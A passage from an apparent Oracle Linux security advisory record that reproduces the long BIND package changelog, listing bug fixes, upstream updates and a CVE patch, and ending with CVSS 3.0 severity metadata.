incorrect permissions on dnszone.schema\n- added a notice to init script when /etc/named.conf doesn't exist (#216075)\n[30:9.3.3-6]\n- fix for #200465: named-checkzone and co. cannot be run as non-root user\n- fix for #212348: chroot'd named causes df permission denied error\n- fix for #211249, #211083 - problems with stopping named\n- fix for #212549: init script does not unmount /proc filesystem\n- fix for #211282: EDNS is globally enabled, crashing CheckPoint FW-1,\n added edns-enable options to named configuration file which can suppress\n EDNS in queries to DNS servers (see /usr/share/doc/bind-9.3.3/misc/options)\n- fix for #212961: bind-chroot doesn't clean up its mess on %preun\n- update to 9.3.3rc3, removed already merged patches\n[30:9.3.3-5]\n- fix for #209359: bind-libs from compatlayer CD will not\n install on ia64\n[30:9.3.3-4]\n- added fix for #210096: warning: group named does not exist - using root\n[30:9.3.3-3]\n- added fix from #209400 - Bind Init Script does not create\n the PID file always, created by Jeff Means\n- added timeout to stop section of init script.\n The default is 100 sec. and can be adjusted by NAMED_SHUTDOWN_TIMEOUT\n shell variable.\n[30:9.3.3-2]\n- removed chcon from %post script, replaced by restorecon\n (Bug 202547, comment no. 
37)\n[30:9.3.3-1]\n- updated to the latest upstream (9.3.3rc2)\n[30:9.3.2-41]\n- added upstream patch for correct SIG handling - CVE-2006-4095\n[30:9.3.2-40]\n- suppressed messages from bind-chroot-admin\n- cleared notes about bind-config\n[30:9.3.2-39]\n- added fix for #203522 - 'bind-chroot-admin -e' command fails\n[30:9.3.2-38]\n- fix for #203194 - tmpfile usage\n[30:9.3.2-37]\n- fix for #202542 - /usr/sbin/bind-chroot-admin: No such file or directory\n- fix for #202547 - file_contexts: invalid context\n[30:9.3.2-36]\n- added Provides: bind-config\n[30:9.3.2-35]\n- fix bug 197493: renaming subpackage bind-config to caching-nameserver\n[30:9.3.2-34]\n- fix bug 199876: make '%exclude libbbind.*' conditional on %{LIBBIND}\n[30:9.3.2-33]\n- fix #195881, perms are not packaged correctly\n[30:9.3.2-32]\n- fix addenda to bug 189789:\n determination of selinux enabled was still not 100% correct in bind-chroot-admin\n- fix addenda to bug 196398:\n make named.init test for NetworkManager being enabled AFTER testing for -D absence;\n named.init now supports a 'DISABLE_NAMED_DBUS' /etc/sysconfig/named setting to disable\n auto-enable of named dbus support if NetworkManager enabled.\n[30:9.3.2-30]\n- fix bug 196398 - Enable -D option automatically in initscript\n if NetworkManager enabled in any runlevel.\n- fix namedGetForwarders for new dbus\n- fix bug 195881 - libbind.so should be owned by bind-libbind-devel\n[30:9.3.2-28.FC6]\n- Rebuild against new dbus\n[30:9.3.2-27.FC6]\n- rebuild with fixed glibc-kernheaders\n[30:9.3.2-26.FC6.1]\n- rebuild\n[30:9.3.2-26.FC6]\n- fix bugs 191093, 189789\n- backport selected fixes from upstream bind9 'v9_3_3b1' CVS version:\n ( see http://www.isc.org/sw/bind9.3.php 'Fixes' ):\n o change 2024 / bug 16027:\n named emitted spurious 'zone serial unchanged' messages on reload\n o change 2013 / bug 15941:\n handle unexpected TSIGs on unsigned AXFR/IXFR responses more gracefully\n o change 2009 / bug 15808: coverity fixes\n o change 1997 / bug 
15818:\n named was failing to replace negative cache entries when a positive one\n for the type was learnt\n o change 1994 / bug 15694: OpenSSL 0.9.8 support\n o change 1991 / bug 15813:\n The configuration data, once read, should be treated as readonly.\n o misc. validator fixes\n o misc. resolver fixes\n o misc. dns fixes\n o misc. isc fixes\n o misc. libbind fixes\n o misc. isccfg fix\n o misc. lwres fix\n o misc. named fixes\n o misc. dig fixes\n o misc. nsupdate fix\n o misc. tests fixes\n[30:9.3.2-24.FC6]\n- and actually put the devel symlinks in the right subpackage\n[30:9.3.2-23.FC6]\n- rebuild for -devel deps\n[30:9.3.2-22]\n- apply upstream patch for ncache_adderesult segfault bug 173961 addenda\n- fix bug 188382: rpm --verify permissions inconsistencies\n- fix bug 189186: use /sbin/service instead of initscript\n- rebuild for new gcc, glibc-kernheaders\n[30:9.3.2-20]\n- fix resolver.c ncache_adderesult segfault reported in addenda to bug 173961\n (upstream bugs #15642, #15528 ?)\n- allow named ability to generate core dumps after setuid (upstream bug #15753)\n[30:9.3.2-18]\n- fix bug 187529: make bind-chroot-admin deal with subdirectories properly\n[30:9.3.2-16]\n- fix bug 187286:\n prevent host(1) printing duplicate 'is an alias for' messages\n for the default AAAA and MX lookups as well as for the A lookup\n (it now uses the CNAME returned for the A lookup for the AAAA and MX lookups).\n This is upstream bug #15702 fixed in the unreleased bind-9.3.3\n- fix bug 187333: fix SOURCE24 and SOURCE25 transposition\n[30:9.3.2-14]\n- fix bug 186577: remove -L/usr/lib from libbind.pc and more .spec file cleanup\n- add '%doc' sample configuration files in /usr/share/doc/bind*/sample\n- rebuild with new gcc and glibc\n[30:9.3.2-12]\n- fix typo in initscript\n- fix Requires(post): policycoreutils in sub-packages\n[30.9.3.2-10]\n- fix bug 185969: more .spec file cleanup\n[30.9.3.2-8]\n- Do not allow package to be installed if named:25 userid creation fails\n- Give 
libbind a pkg-config file\n- remove restorecon from bind-chroot-admin (not required).\n- fix named.caching-nameserver.conf (listen-on-v6 port 53 { ::1 };)\n[30:9.3.2-7]\n- fix issues with bind-chroot-admin\n[30:9.3.2-6]\n- replace caching-nameserver with bind-config sub-package\n- fix bug 177595: handle case where is a link in initscript\n- fix bug 177001: bind-config creates symlinks OK now\n- fix bug 176388: named.conf is now never replaced by any RPM\n- fix bug 176248: remove unecessary creation of rpmsave links\n- fix bug 174925: no replacement of named.conf\n- fix bug 173963: existing named.conf never modified\n- major .spec file cleanup\n[30:9.3.2-4.1]\n- bump again for double-long bug on ppc(64)\n[30:9.3.2-4]\n- regenerate redhat_doc patch for non-DBUS builds\n- allow dbus builds to work with dbus version < 0.6 (bz #179816)\n[30:9.3.2-3]\n- try supporting without dbus support\n[30:9.3.2-2.1]\n- Rebuild for new gcc, glibc, glibc-kernheaders\n[30:9.3.2-2]\n- fix bug 177854: temporary fix for broken kernel-2.6.15-1854+\n /proc/net/if_inet6 format\n[30:9.3.2-1]\n- Upgrade to 9.3.2, released today\n[28:9.3.2rc1-2]\n- fix bug 176100: do not Require: perl just for namedGetForwarders !\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[28:9.3.2rc-1]\n- Upgrade to upstream version 9.3.2rc1\n- fix namedSetForwarders -> namedGetForwarders SOURCE14 typo\n[24:9.3.1-26]\n- rebuild for new dbus 0.6 dependency; remove use of\n DBUS_NAME_FLAG_PROHIBIT_REPLACEMENT\n[24:9.3.1-24]\n- allow D-BUS support to work in bind-chroot environment:\n workaround latest selinux policy by mounting /var/run/dbus/\n under chroot instead of /var/run/dbus/system-bus-socket\n[24:9.3.1-22]\n- fix bug 172632 - remove .la files\n- ship namedGetForwarders and namedSetForwarders scripts\n- fix detection of -D option in chroot\n[24:9.3.1-21]\n- rebuilt with new openssl\n[24.9.3.1-20]\n- Allow the -D enable D-BUS option to be used within bind-chroot .\n- fix bug 171226: supply some documentation for pgsql 
SDB .\n[24:9.3.1-18]\n- fix bug 169969: do NOT call dbus_svc_dispatch() in dbus_mgr_init_dbus() -\n task->state != task_ready and will cause Abort in task.c if process\n is waiting for NameOwnerChanged to do a SetForwarders\n[24:9.3.1-16]\n- Fix reconnecting to dbus-daemon after it stops & restarts .\n[24:9.3.1-14]\n- When forwarder nameservers are changed with D-BUS, flush the cache.\n[24:9.3.1-12]\n- fix bug 168302: use %{__cc} for compiling dns-keygen\n- fix bug 167682: bind-chroot directory permissions\n- fix issues with -D dbus option when dbus service not running or disabled\n[24:9.3.1-12]\n- fix bug 167062: named should be started after syslogd by default\n[24:9.3.1-11]\n- fix bug 166227: host: don't do default AAAA and MX lookups with '-t a' option\n[24:9.3.1-10]\n- Build with D-BUS patch by default; D-BUS support enabled with named -D option\n- Enable D-BUS for named_sdb also\n- fix sdb pgsql's zonetodb.c: must use isc_hash_create() before dns_db_create()\n- update fix for bug 160914 : test for RD=1 and ARCOUNT=0 also before trying next server\n- fix named.init script to handle named_sdb properly\n- fix named.init script checkconfig() to handle named '-c' option\n and make configtest, test, check configcheck synonyms\n[24:9.3.1-8]\n- fix named.init script bugs 163598, 163409, 151852(addendum)\n[24:9.3.1-7]\n- fix bug 160914: resolver utilities should try next server on empty referral\n (now that glibc bug 162625 is fixed)\n host and nslookup now by default try next server on SERVFAIL\n (host now has '-s' option to disable, and nslookup given\n '[no]fail' option similar to dig's [no]fail option).\n- rebuild and re-test with new glibc & gcc (all tests passed).\n[24:9.3.1-6]\n- fix bug 157950: dig / host / nslookup should reject invalid resolv.conf\n files and not use uninitialized garbage nameserver values\n (ISC bug 14841 raised).\n[24:9.3.1-4_FC4]\n- Fix SDB LDAP\n[24:9.3.1-4]\n- Fix bug 157601: give named.init a configtest function\n- Fix bug 156797: 
named.init should check SELinux booleans.local before booleans\n- Fix bug 154335: if no controls in named.conf, stop named with -TERM sig, not rndc\n- Fix bug 155848: add NOTES section to named.8 man-page with info on all Red Hat\n BIND quirks and SELinux DDNS / slave zone file configuration\n- D-BUS patches NOT applied until dhcdbd is in FC\n[24:9.3.1-4_dbus]\n- Enhancement to allow dynamic forwarder table management and\n- DHCP forwarder auto-configuration with D-BUS\n[24:9.3.1-2_FC4]\n- Rebuild for bind-sdb libpq.so.3 dependency\n- fix bug 150981: don't install libbind man-pages if no libbind\n- fix bug 151852: mount proc on /proc to allow sysconf(...)\n to work and correct number of CPUs to be determined\n[24:9.3.1-1_FC4]\n- Upgrade to ISC BIND 9.3.1 (final release) released today.\n[22.9.3.1rc1-5]\n- fix bug 150288: h_errno not being accessed / set correctly in libbind\n- add libbind man-pages from bind-8.4.6\n[22:9.3.1rc1-4]\n- Rebuild with gcc4 / glibc-2.3.4-14.\n[22:9.3.1rc1-3]\n- configure with --with-pic to get PIC libraries\n[22:9.3.1rc1-2]\n- fix bug 149183: don't use getifaddrs() .\n[22:9.3.1rc1-1]\n- Upgrade to 9.3.1rc1\n- Add Simplified Database Backend (SDB) sub-package ( bind-sdb )\n- add named_sdb - ldap + pgsql + dir database backend support with\n- 'ENABLE_SDB' named.sysconfig option\n- Add BIND resolver library & includes sub-package ( libbind-devel)\n- fix bug 147824 / 147073 / 145664: ENABLE_ZONE_WRITE in named.init\n- fix bug 146084 : shutup restorecon\n[22:9.3.0-2]\n- Fix bug 143438: named.init will now make correct ownership of /var/named\n- based on 'named_write_master_zones' SELinux boolean.\n- Fix bug 143744: dig & nsupdate IPv6 timeout (dup of 140528)\n[9.3.0-1]\n- Upgrade BIND to 9.3.0 in Rawhide / FC4 (bugs 134529, 133654...)\n[20:9.2.4-4]\n- Fix bugs 140528 and 141113:\n- 2 second timeouts when IPv6 not configured and root nameserver's\n- AAAA addresses are queried\n[20:9.2.4-2]\n- Fix bug 136243: bind-chroot %post must run 
restorecon -R /var/named/chroot\n- Fix bug 135175: named.init must return non-zero if named is not run\n- Fix bug 134060: bind-chroot %post must use mktemp, not /tmp/named\n- Fix bug 133423: bind-chroot %files entries should have been %dirs\n[20:9.2.4-1]\n- BIND 9.2.4 (final release) released - source code actually\n- identical to 9.2.4rc8, with only version number change.\n[10:9.2.4rc8-14]\n- Upgrade to upstream bind-9.2.4rc8 .\n- Progress: Finally! Hooray! ISC bind now distributes:\n- o named.conf(5) and nslookup(8) manpages\n- 'bind-manpages.bz2' source can now disappear\n- (could this have something to do with ISC bug I raised about this?)\n- o 'deprecation_msg' global has vanished\n- bind-9.2.3rc3-deprecation_msg_shut_up.diff.bz2 can disappear\n[10:9.2.4rc8-14]\n- Fix bug 106572/132385: copy /etc/localtime to chroot on start\n[10:9.2.4rc7-12_EL3]\n- Fix bug 132303: if ROOTDIR line was replaced after upgrade from\n- bind-chroot-9.2.2-21, restart named\n[10:9.2.4rc7-11_EL3]\n- Fix bug 131803: replace ROOTDIR line removed by broken\n- bind-chroot 9.2.2-21's '%postun'; added %triggerpostun for bind-chroot\n[10:9.2.4rc7-10_EL3]\n- Fix bugs 130121 & 130981 for RHEL-3\n[10:9.2.4rc7-10]\n- Fix bug 130121: add '%ghost' entries for files included in previous\n- bind-chroot & not in current - ie. 
named.conf, rndc.key, dev/* -\n- that RPM removed after upgrade .\n* Thu Aug 26 2004 Jason Vas Dias \n- Fix bug 130981: add '-t' option to named-checkconf invocation in\n- named.init if chroot installed.\n* Wed Aug 25 2004 Jason Vas Dias \n- Remove resolver(5) manpage now in man-pages (bug 130792);\n- Don't create /dev/ entries in bind-chroot if already there (bug 127556);\n- fix bind-devel Requires (bug 130919)\n- Set default location for dumpdb & stats files to /var/named/data\n* Tue Aug 24 2004 Jason Vas Dias \n- Fix devel Requires for bug 130738 & fix version\n* Tue Aug 24 2004 Jason Vas Dias \n- Fix errors on clean install if named group does not exist\n- (bug 130777)\n* Thu Aug 19 2004 Jason Vas Dias \n- Upgrade to bind-9.2.4rc7; applied initscript fix\n- for bug 102035.\n* Mon Aug 09 2004 Jason Vas Dias \n- Fixed bug 129289: bind-chroot install / deinstall\n- on install, existing config files 'safe_replace'd\n- with links to chroot copies; on uninstall, moved back.\n* Fri Aug 06 2004 Jason Vas Dias \n- Fixed bug 129258: '/var/tmp' typo in spec\n* Wed Jul 28 2004 Jason Vas Dias \n- Fixed bug 127124 : 'Requires: kernel >= 2.4'\n- causes problems with Linux VServers\n* Tue Jul 27 2004 Jason Vas Dias \n- Fixed bug 127555 : chroot tar missing var/named/slaves\n* Fri Jul 16 2004 Jason Vas Dias \n- Upgraded to ISC version 9.2.4rc6\n* Fri Jul 16 2004 Jason Vas Dias \n- Fixed named.init generation of error messages on\n- 'service named stop' and 'service named reload'\n- as per bug 127775\n[9.2.3-19]\n- Bump for rhel 3.0 U3\n[9.2.3-18]\n- remove disable-linux-caps\n[9.2.3-17]\n- Update RHEL3 to latest bind\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[9.2.3-15]\n- Remove device files from chroot, Named uses the system one\n[9.2.3-14]\n- Move RFC to devel package\n[9.2.3-13]\n- Fix location of restorecon\n[9.2.3-12]\n- Tighten security on config files. 
Should be owned by root\n[9.2.3-11]\n- Update key patch to include conf-keygen\n[9.2.3-10]\n- fix chroot to only happen once.\n- fix init script to do kill insteall of killall\n[9.2.3-9]\n- Add fix for SELinux security context\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n* Sat Feb 28 2004 Florian La Roche \n- run ldconfig for libs subrpm\n* Mon Feb 23 2004 Tim Waugh \n- Use ':' instead of '.' as separator for chown.\n[9.2.3-7]\n- Add COPYRIGHT\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[9.2.3-5]\n- Add defattr to libs\n[9.2.3-4]\n- Break out library package\n[9.2.3-3]\n- Fix condrestart\n[9.2.3-2]\n- Move libisc and libdns to bind from bind-util\n[9.2.3-1]\n- Move to 9.2.3\n[9.2.2.P3-10]\n- Add PIE support\n[9.2.2.P3-9]\n- Add /var/named/slaves directory\n* Sun Oct 12 2003 Florian La Roche \n- do not link against libnsl, not needed for Linux\n[9.2.2.P3-6]\n- Fix local time in log file\n[9.2.2.P3-5]\n- Try again\n[9.2.2.P3-4]\n- Fix handling of chroot -/dev/random\n[9.2.2.P3-3]\n- Stop hammering stuff on update of chroot environment\n[9.2.2.P3-2]\n- Fix chroot directory to grab all subdirectories\n[9.2.2.P3-1]\n- New patch to support for 'delegation-only'\n[9.2.2-23]\n- patch support for 'delegation-only'\n[9.2.2-22]\n- Update to build on RHL\n[9.2.2-21]\n- Install libraries as exec so debug info will be pulled\n[9.2.2-20]\n- Remove BSDCOMPAT (BZ 99454)\n[9.2.2-19]\n- Update to build on RHL\n[9.2.2-18]\n- Change protections on /var/named and /var/chroot/named\n[9.2.2-17]\n- Update to build on RHL\n[9.2.2-16]\n- Update to build on RHEL\n* Wed Jun 04 2003 Elliot Lee \n- rebuilt\n[9.2.2-14]\n- Update to build on RHEL\n[9.2.2-13]\n- Fix config description of named.conf in chroot\n- Change named.init script to check for existence of /etc/sysconfig/network\n[9.2.2-12]\n- Update to build on RHEL\n[9.2.2-11]\n- Update to build on RHEL\n[9.2.2-10]\n- Fix echo OK on starting/stopping service\n[9.2.2-9]\n- Update to build on RHEL\n[9.2.2-8]\n- Fix echo on startup\n[9.2.2-7]\n- 
Fix problems with chroot environment\n- Eliminate posix threads\n[9.2.2-6]\n- Fix build problems\n[9.2.2-5]\n- Fix build on beehive\n[9.2.2-4]\n- build bind-chroot kit\n[9.2.2-3]\n- Change configure to use proper threads model\n[9.2.2-2]\n- update to 9.2.2\n[9.2.2-1]\n- update to 9.2.2\n[9.2.1-16]\n- Put a sleep in restart to make sure stop completes\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[9.2.1-14]\n- Separate /etc/rndc.key to separate file\n[9.2.1-13]\n- Use openssl's pkgconfig data, if available, at build-time.\n[9.2.1-12]\n- Fix log rotate to use service named reload\n- Change service named reload to give success/failure message [73770]\n- Fix File checking [75710]\n- Begin change to automatically run in CHROOT environment\n[9.2.1-10]\n- Fix startup script to work like all others.\n[9.2.1-9]\n- Fix configure to build on x86_64 platforms\n* Wed Aug 07 2002 Karsten Hopp \n- fix #70583, doesn't build on IA64\n[9.2.1-8]\n- bind-utils shouldn't require bind\n[9.2.1-7]\n- fix name of pidfine in logrotate script (#68842)\n- fix owner of logfile in logrotate script (#41391)\n- fix nslookup and named.conf man pages (output on stderr)\n (#63553, #63560, #63561, #54889, #57457)\n- add rfc1912 (#50005)\n- gzip all rfc's\n- fix typo in keygen.c (#54870)\n- added missing manpages (#64065)\n- shutdown named properly with rndc stop (#62492)\n- /sbin/nologin instead of /bin/false (#68607)\n- move nsupdate to bind-utils (where the manpage already was) (#66209, #66381)\n- don't kill initscript when rndc fails (reload) (#58750)\n[9.2.1-5]\n- Fix #65975\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Thu May 23 2002 Tim Powers \n- automated rebuild\n[9.2.1-2]\n- Move libisccc, lib isccfg and liblwres from bind-utils to bind,\n they're not required if you aren't running a nameserver.\n* Fri May 03 2002 Florian La Roche \n- update to 9.2.1 release\n[9.2.0-8]\n- Merge 30+ bug fixes from 9.2.1rc1 code\n[9.2.0-7]\n- Don't exit if /etc/named.conf doesn't exist if we're 
running\n chroot (#60868)\n- Revert Elliot's changes, we do require specific glibc/glibc-kernheaders\n versions or bug #58335 will be back. 'It compiles, therefore it works'\n isn't always true.\n[9.2.0-6]\n- Fix BuildRequires (we don't need specific glibc/glibc-kernheaders\nversions).\n- Use _smp_mflags\n[9.2.0-4]\n- rebuild, require recent autoconf, automake (#58335)\n* Fri Jan 25 2002 Tim Powers \n- rebuild against new libssl\n* Wed Jan 09 2002 Tim Powers \n- automated rebuild\n[9.2.0-1]\n- 9.2.0\n[9.2.0-0.rc10.2]\n- 9.2.0rc10\n[9.2.0-0.rc8.2]\n- Fix up rndc.conf (#55574)\n[9.2.0-0.rc8.1]\n- rc8\n- Enforce --enable-threads\n[9.2.0-0.rc7.1]\n- 9.2.0rc7\n- Use rndc status for 'service named status', it's supposed to actually\n work in 9.2.x.\n[9.2.0-0.rc5.1]\n- 9.2.0rc5\n- Fix rpm --rebuild with ancient libtool versions (#53938, #54257)\n[9.2.0-0.rc4.1]\n- 9.2.0rc4\n[9.2.0-0.rc3.1]\n- 9.2.0rc3\n- remove ttl patch, I don't think we need this for 8.0.\n- remove dig.1.bz2 from the bind8-manpages tar file, 9.2 has a new dig man page\n- add lwres* man pages to -devel\n[9.1.3-4]\n- Make sure /etc/rndc.conf isn't world-readable even after the\n %post script inserted a random key (#53009)\n[9.1.3-3]\n- Add build dependencies (#49368)\n- Make sure running service named start several times doesn't create\n useless processes (#47596)\n- Work around the named parent process returning 0 even if the config\n file is broken (it's parsed later by the child processes) (#45484)\n[9.1.3-2]\n- Don't use rndc status, it's not yet implemented (#48839)\n* Sun Jul 08 2001 Florian La Roche \n- update to 9.1.3 release\n[9.1.3-0.rc3.1]\n- Fix up rndc configuration and improve security (#46586)\n[9.1.3-0.rc2.2]\n- Sync with caching-nameserver-7.1-6\n[9.1.3-0.rc2.1]\n- Update to rc2\n[9.1.3-0.rc1.3]\n- Remove resolv.conf(5) man page, it's now in man-pages\n[9.1.3-0.rc1.2]\n- Add named.conf man page from bind 8.x (outdated, but better than nothing,\n - Rename the rndc key (#42895)\n- Add 
dnssec* man pages\n[9.1.3-0.rc1.1]\n- 9.1.3rc1\n- s/Copyright/License/\n[9.1.2-1]\n- 9.1.2 final. No changes between 9.1.2-0.rc1.1 and this one, except for\n the version number, though.\n[9.1.2-0.rc1.1]\n- 9.1.2rc1\n[9.1.1-1]\n- 9.1.1\n[9.1.0-10]\n- Merge fixes from 9.1.1rc5\n[9.1.0-9]\n- Work around bind 8 -> bind 9 migration problem when using buggy zone files:\n accept zones without a TTL, but spew out a big fat warning. (#31393)\n* Thu Mar 08 2001 Bernhard Rosenkraenzer \n- Add fixes from rc4\n* Fri Mar 02 2001 Nalin Dahyabhai \n- rebuild in new environment\n* Thu Mar 01 2001 Bernhard Rosenkraenzer \n- killall -HUP named if rndc reload fails (#30113)\n* Tue Feb 27 2001 Bernhard Rosenkraenzer \n- Merge some fixes from 9.1.1rc3\n* Tue Feb 20 2001 Bernhard Rosenkraenzer \n- Don't use the standard rndc key from the documentation, instead, create a random one\n at installation time (#26358)\n- Make /etc/rndc.conf readable by user named only, it contains secret keys\n* Tue Feb 20 2001 Bernhard Rosenkraenzer \n- 9.1.1 probably won't be out in time, revert to 9.1.0 and apply fixes\n from 9.1.1rc2\n- bind requires bind-utils (#28317)\n* Tue Feb 13 2001 Bernhard Rosenkraenzer \n- Update to rc2, fixes 2 more bugs\n- Fix build with glibc >= 2.2.1-7\n* Thu Feb 08 2001 Bernhard Rosenkraenzer \n- Update to 9.1.1rc1; fixes 17 bugs (14 of them affecting us;\n 1 was fixed in a Red Hat patch already, 2 others are portability\n improvements)\n* Wed Feb 07 2001 Bernhard Rosenkraenzer \n- Remove initscripts 5.54 requirement (#26489)\n* Mon Jan 29 2001 Bernhard Rosenkraenzer \n- Add named-checkconf, named-checkzone (#25170)\n* Mon Jan 29 2001 Trond Eivind Glomsrod \n- use echo, not gprintf\n* Wed Jan 24 2001 Bernhard Rosenkraenzer \n- Fix problems with \n Patch from Daniel Roesen \n Bug #24890\n* Thu Jan 18 2001 Bernhard Rosenkraenzer \n- 9.1.0 final\n* Sat Jan 13 2001 Bernhard Rosenkraenzer \n- 9.1.0rc1\n- i18nify init script\n- bzip2 source to save space\n* Thu Jan 11 2001 Bernhard 
Rosenkraenzer \n- Fix %postun script\n* Tue Jan 09 2001 Bernhard Rosenkraenzer \n- 9.1.0b3\n* Mon Jan 08 2001 Bernhard Rosenkraenzer \n- Add named.conf man page from bind8 (#23503)\n* Sun Jan 07 2001 Bernhard Rosenkraenzer \n- Make /etc/rndc.conf and /etc/sysconfig/named noreplace\n- Make devel require bind = %{version} rather than just bind\n* Sun Jan 07 2001 Bernhard Rosenkraenzer \n- Fix init script for real\n* Sat Jan 06 2001 Bernhard Rosenkraenzer \n- Fix init script when ROOTDIR is not set\n* Thu Jan 04 2001 Bernhard Rosenkraenzer \n- Add hooks for setting up named to run chroot (RFE #23246)\n- Fix up requirements\n* Fri Dec 29 2000 Bernhard Rosenkraenzer \n- 9.1.0b2\n* Wed Dec 20 2000 Bernhard Rosenkraenzer \n- Move run files to /var/run/named/ - /var/run isn't writable\n by the user we're running as. (Bug #20665)\n* Tue Dec 19 2000 Bernhard Rosenkraenzer \n- Fix reverse lookups (#22272)\n- Run ldconfig in %post utils\n* Tue Dec 12 2000 Karsten Hopp \n- fixed logrotate script (wrong path to kill)\n- include header files in -devel package\n- bugzilla #22049, #19147, 21606\n* Fri Dec 08 2000 Bernhard Rosenkraenzer \n- 9.1.0b1 (9.1.0 is in our timeframe and less buggy)\n* Mon Nov 13 2000 Bernhard Rosenkraenzer \n- 9.0.1\n* Mon Oct 30 2000 Bernhard Rosenkraenzer \n- Fix initscript (Bug #19956)\n- Add sample rndc.conf (Bug #19956)\n- Fix build with tar 1.13.18\n* Tue Oct 10 2000 Bernhard Rosenkraenzer \n- Add some missing man pages (taken from bind8) (Bug #18794)\n* Sun Sep 17 2000 Bernhard Rosenkraenzer \n- 9.0.0 final\n* Wed Aug 30 2000 Bernhard Rosenkraenzer \n- rc5\n- fix up nslookup\n* Thu Aug 24 2000 Bernhard Rosenkraenzer \n- rc4\n* Thu Jul 13 2000 Bernhard Rosenkraenzer \n- 9.0.0rc1\n* Wed Jul 12 2000 Prospector \n- automatic rebuild\n* Sun Jul 09 2000 Florian La Roche \n- add 'exit 0' for uninstall case\n* Fri Jul 07 2000 Florian La Roche \n- add prereq init.d and cleanup install section\n* Fri Jun 30 2000 Trond Eivind Glomsrod \n- fix the init script\n* 
Wed Jun 28 2000 Nalin Dahyabhai \n- make libbind.a and nslookup.help readable again by setting INSTALL_LIB to ''\n* Mon Jun 26 2000 Bernhard Rosenkranzer \n- Fix up the initscript (Bug #13033)\n- Fix build with current glibc (Bug #12755)\n- /etc/rc.d/init.d -> /etc/init.d\n- use %{_mandir} rather than /usr/share/man\n* Mon Jun 19 2000 Bill Nottingham \n- fix conflict with man-pages\n- remove compatibilty chkconfig links\n- initscript munging\n* Wed Jun 14 2000 Nalin Dahyabhai \n- modify logrotate setup to use PID file\n- temporarily disable optimization by unsetting at build-time\n- actually bump the release this time\n* Sun Jun 04 2000 Bernhard Rosenkraenzer \n- FHS compliance\n* Mon Apr 17 2000 Nalin Dahyabhai \n- clean up restart patch\n* Mon Apr 10 2000 Nalin Dahyabhai \n- provide /var/named (fix for bugs #9847, #10205)\n- preserve args when restarted via ndc(8) (bug #10227)\n- make resolv.conf(5) a link to resolver(5) (bug #10245)\n- fix SYSTYPE bug in all makefiles\n- move creation of named user from %post into %pre\n* Mon Feb 28 2000 Bernhard Rosenkranzer \n- Fix TTL (patch from ISC, Bug #9820)\n* Wed Feb 16 2000 Bernhard Rosenkranzer \n- fix typo in spec (it's %post, without a leading blank) introduced in -6\n- change SYSTYPE to linux\n* Fri Feb 11 2000 Bill Nottingham \n- pick a standard < 100 uid/gid for named\n* Fri Feb 04 2000 Elliot Lee \n- Pass named a '-u named' parameter by default, and add/remove user.\n* Thu Feb 03 2000 Bernhard Rosenkraenzer \n- fix host mx bug (Bug #9021)\n* Mon Jan 31 2000 Cristian Gafton \n- rebuild to fix dependencies\n- man pages are compressed\n* Wed Jan 19 2000 Bernhard Rosenkraenzer \n- It's /usr/bin/killall, not /usr/sbin/killall (Bug #8063)\n* Mon Jan 17 2000 Bernhard Rosenkraenzer \n- Fix up location of named-bootconf.pl and make it executable\n (Bug #8028)\n- bind-devel requires bind\n* Mon Nov 15 1999 Bernhard Rosenkraenzer \n- update to 8.2.2-P5\n* Wed Nov 10 1999 Bill Nottingham \n- update to 8.2.2-P3\n* Tue Oct 12 
1999 Cristian Gafton \n- add patch to stop a cache only server from complaining about lame servers\n on every request.\n* Fri Sep 24 1999 Preston Brown \n- use real stop and start in named.init for restart, not ndc restart, it has\n problems when named has changed during a package update... (# 4890)\n* Fri Sep 10 1999 Bill Nottingham \n- chkconfig --del in %preun, not %postun\n* Mon Aug 16 1999 Bill Nottingham \n- initscript munging\n* Mon Jul 26 1999 Bill Nottingham \n- fix installed chkconfig links to match init file\n* Sat Jul 03 1999 Jeff Johnson \n- conflict with new (in man-1.24) man pages (#3876,#3877).\n* Tue Jun 29 1999 Bill Nottingham \n- fix named.logrotate (wrong %SOURCE)\n* Fri Jun 25 1999 Jeff Johnson \n- update to 8.2.1.\n- add named.logrotate (#3571).\n- hack around egcs-1.1.2 -m486 bug (#3413, #3485).\n- vet file list.\n* Fri Jun 18 1999 Bill Nottingham \n- don't run by default\n* Sun May 30 1999 Jeff Johnson \n- nslookup fixes (#2463).\n- missing files (#3152).\n* Sat May 01 1999 Stepan Kasal \n- nslookup patched:\n to count numRecords properly\n to fix subsequent calls to ls -d\n to parse 'view' and 'finger' commands properly\n the view hack updated for bind-8 (using sed)\n* Wed Mar 31 1999 Bill Nottingham \n- add ISC patch\n- add quick hack to make host not crash\n- add more docs\n* Fri Mar 26 1999 Cristian Gafton \n- add probing information in the init file to keep linuxconf happy\n- dont strip libbind\n* Sun Mar 21 1999 Cristian Gafton \n- auto rebuild in the new build environment (release 3)\n* Wed Mar 17 1999 Preston Brown \n- removed 'done' output at named shutdown.\n* Tue Mar 16 1999 Cristian Gafton \n- version 8.2\n* Wed Dec 30 1998 Cristian Gafton \n- patch to use the __FDS_BITS macro\n- build for glibc 2.1\n* Wed Sep 23 1998 Jeff Johnson \n- change named.restart to /usr/sbin/ndc restart\n* Sat Sep 19 1998 Jeff Johnson \n- install man pages correctly.\n- change K10named to K45named.\n* Wed Aug 12 1998 Jeff Johnson \n- don't start if 
/etc/named.conf doesn't exist.\n* Sat Aug 08 1998 Jeff Johnson \n- autmagically create /etc/named.conf from /etc/named.boot in %post\n- remove echo in %post\n* Wed Jun 10 1998 Jeff Johnson \n- merge in 5.1 mods\n* Sun Apr 12 1998 Manuel J. Galan \n- Several essential modifications to build and install correctly.\n- Modified 'ndc' to avoid deprecated use of '-'\n* Mon Dec 22 1997 Scott Lampert \n- Used buildroot\n- patched bin/named/ns_udp.c to use \n for include\n on Redhat 5.0 instead of ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2022-02-03T00:00:00", "type": "oraclelinux", 